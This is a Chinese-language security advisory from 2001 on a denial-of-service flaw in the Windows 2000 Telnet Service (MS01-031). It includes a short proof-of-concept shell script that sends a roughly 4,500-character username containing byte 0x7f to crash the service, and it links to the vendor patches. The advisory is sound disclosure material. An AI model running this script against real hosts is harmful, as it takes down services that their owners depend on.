发布日期：2001-06-07
更新日期：2001-06-12

受影响系统：

Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1

描述：

---

BUGTRAQ ID ：2838
CVE ID     ：CAN-2001-0348

由于Windows 2000 Telnet Service实现上的漏洞，用户输入的用户名中包含大约4300个字符和以及某个特殊字符(0x7f)就能够使Telnet Service停止响应。

<*来源：Microsoft Security Bulletin MS01-031：
       链接： http://www.microsoft.com/technet/security/bulletin/MS01-031.asp
       Michal Zalewski （lcamtuf@razor.bindview.com)
*>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Michal Zalewski （lcamtuf@razor.bindview.com)提供了下列测试代码：

  - test.sh -

  #!/bin/bash
  ( sleep 1
    perl -e '{printf "%s\x7f%s","A"x4500,"A"x100}'
    sleep 3
  ) | telnet victimbox

建议：

---

厂商补丁：

微软已就此发布了一个安全公告(MS01-031)以及相应补丁。

您可以在下列地址看到微软安全公告的详细内容：

http://www.microsoft.com/technet/security/bulletin/ms01-031.asp

补丁程序可以在下列地址下载：

- Microsoft Windows 2000 Professional, Server, Advanced Server:
  http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30508

- Microsoft Windows 2000 Datacenter Server:
  Microsoft Windows 2000 Datacenter Server的补丁程序与硬件相关，可以从硬件厂商获得。


浏览次数：4053
严重程度：0（网友投票）